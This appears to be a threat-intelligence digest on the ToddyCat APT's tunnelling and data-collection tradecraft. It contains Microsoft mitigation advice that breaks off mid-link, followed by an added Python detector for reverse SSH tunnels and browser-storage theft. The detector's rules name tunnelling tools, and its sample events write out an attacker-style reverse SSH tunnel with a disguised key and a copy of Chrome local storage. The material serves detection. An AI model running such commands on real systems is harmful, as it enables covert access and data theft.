One Article Review

Source RiskIQ
Identifier 8489234
Publication date 2024-04-26 19:12:08 (viewed: 2024-04-26 20:08:19)
Title ToddyCat APT Group Hones Data Exfiltration Tactics, Exploits Legitimate Tools
Text

#### Targeted Geolocations
- Oceania
- Southeast Asia
- South Asia
- East Asia
- Central Asia

#### Targeted Industries
- Government Agencies & Services
- Defense

## Snapshot
Kaspersky reports the APT group ToddyCat has been observed targeting governmental organizations, particularly defense-related ones in the Asia-Pacific region, with the goal of stealing sensitive information on an industrial scale.

## Description
They employ various tools and techniques, including traffic tunneling and the creation of reverse SSH tunnels, to maintain constant access to compromised infrastructure. The attackers utilize disguised OpenSSH private key files, execute scripts to modify folder permissions, create SSH tunnels to redirect network traffic, and employ the SoftEther VPN package to potentially facilitate unauthorized access and data exfiltration. Additionally, they use various files and techniques, such as concealing file purposes, copying files through shared resources, and tunneling to legitimate cloud providers, to gain access to victim hosts and evade detection.

The threat actors initially gain access to systems by installing servers, modifying server settings, and utilizing tools like Ngrok and Krong to redirect C2 traffic and create tunnels for unauthorized access. They also employ the FRP client, a data collection tool named "cuthead", and a tool called "WAExp" to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers demonstrate a sophisticated and evolving approach to data collection and exfiltration, utilizing multiple tools and techniques to achieve their objectives.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of information stealer threats.

- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentic
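As an added defensive illustration (not code from Kaspersky, Microsoft or the source article), the script below runs a few heuristic detection rules over constructed process-creation events that mirror the tradecraft listed in the description: an SSH client started with a reverse tunnel (`-R` or `RemoteForward`), an SSH identity file kept outside any `.ssh` directory (consistent with a disguised private key), execution of tunnelling or VPN tools, and a non-browser process touching a Chromium `Local Storage\leveldb` directory, which is where the local storage of a site such as WhatsApp Web would reside. The executable names matched (`ngrok`, `frpc`, `vpnclient`, and so on), the event format and every sample line are assumptions made for this example, not indicators published by the source.

```python
"""Heuristic rules for tunnelling and browser-storage collection tradecraft.

Added example; the rules, executable names and log format are assumptions,
not indicators from the article or from any vendor product.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

# Tools named in the article. The binary names are assumed for the example.
TUNNEL_TOOL_HINTS = ("ngrok", "krong", "frpc", "frps", "softether",
                     "vpnclient", "vpnbridge", "cuthead", "waexp")
BROWSERS = ("chrome", "msedge", "firefox", "brave", "opera")
SSH_NAMES = ("ssh", "ssh.exe", "plink.exe")  # plink: PuTTY's CLI SSH client


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def _argv(cmdline: str) -> list[str]:
    """Split a command line, keeping Windows backslashes, and unquote tokens."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    return [tok.strip('"') for tok in tokens]


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def analyse(cmdline: str, host: str) -> list[Finding]:
    """Apply all rules to one command line and return the findings."""
    argv = _argv(cmdline)
    if not argv:
        return []
    exe = _basename(argv[0])
    findings: list[Finding] = []

    if exe in SSH_NAMES:
        # Reverse tunnel: "-R", "-R<spec>" or "-o RemoteForward=...".
        for i, arg in enumerate(argv[1:], 1):
            remote_fwd = (arg == "-o" and i + 1 < len(argv)
                          and argv[i + 1].lower().startswith("remoteforward"))
            if arg.startswith("-R") or remote_fwd:
                findings.append(Finding(host, "reverse_ssh_tunnel", cmdline))
                break
        # Identity file outside a .ssh directory (possible disguised key file).
        for i, arg in enumerate(argv[1:], 1):
            if arg == "-i" and i + 1 < len(argv) and ".ssh" not in argv[i + 1].lower():
                findings.append(Finding(host, "ssh_key_outside_dotssh", argv[i + 1]))

    if any(hint in exe for hint in TUNNEL_TOOL_HINTS):
        findings.append(Finding(host, "tunnel_tool", exe))

    # Chromium keeps site local storage under ".../Local Storage/leveldb";
    # a non-browser process reading it is worth a look.
    lowered = cmdline.lower()
    if ("local storage" in lowered and "leveldb" in lowered
            and exe.replace(".exe", "") not in BROWSERS):
        findings.append(Finding(host, "browser_local_storage_access", cmdline))
    return findings


def scan(events: list[str]) -> list[Finding]:
    """Parse '<timestamp> <host> <user> <cmdline>' events (assumed format)."""
    out: list[Finding] = []
    for line in events:
        try:
            _ts, host, _user, cmd = line.split(" ", 3)
        except ValueError:
            continue            # malformed event, skip it
        out.extend(analyse(cmd, host))
    return out


# Constructed sample events; hosts, users and addresses are fictitious.
SAMPLE_EVENTS = [
    "2024-04-20T03:12:07Z srv-fin01 svc_backup C:\\Windows\\Temp\\ssh.exe -N "
    "-R 8443:127.0.0.1:3389 -i C:\\ProgramData\\update.dat relay@203.0.113.10",
    "2024-04-20T03:15:41Z srv-fin01 svc_backup C:\\ProgramData\\vpnclient.exe /start",
    "2024-04-20T03:20:02Z ws-hr07 jdoe \"C:\\Program Files\\Google\\Chrome\\"
    "Application\\chrome.exe\" --profile-directory=Default",
    "2024-04-20T03:22:30Z ws-hr07 jdoe xcopy /E \"C:\\Users\\jdoe\\AppData\\Local\\"
    "Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\" C:\\ProgramData\\ls\\",
    "2024-04-20T08:01:11Z ws-dev03 asmith ssh -i ~/.ssh/id_ed25519 git@git.example.com",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host:10} {f.rule:30} {f.detail}")
```

Run as a script it prints four findings, three for `srv-fin01` and one for `ws-hr07`; the Chrome launch and the developer's ordinary `ssh -i ~/.ssh/...` produce none. In production the same rules would consume endpoint process-creation telemetry rather than the embedded list, and the tool-name rule should be treated as a triage hint, since SoftEther, Ngrok and FRP are all legitimately used.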
Sent Yes
Tags Ransomware Spam Malware Tool Threat Industrial Cloud
Rating ★★


The article does not seem to have been picked up after its publication.


The article does not seem to have been taken from an earlier one.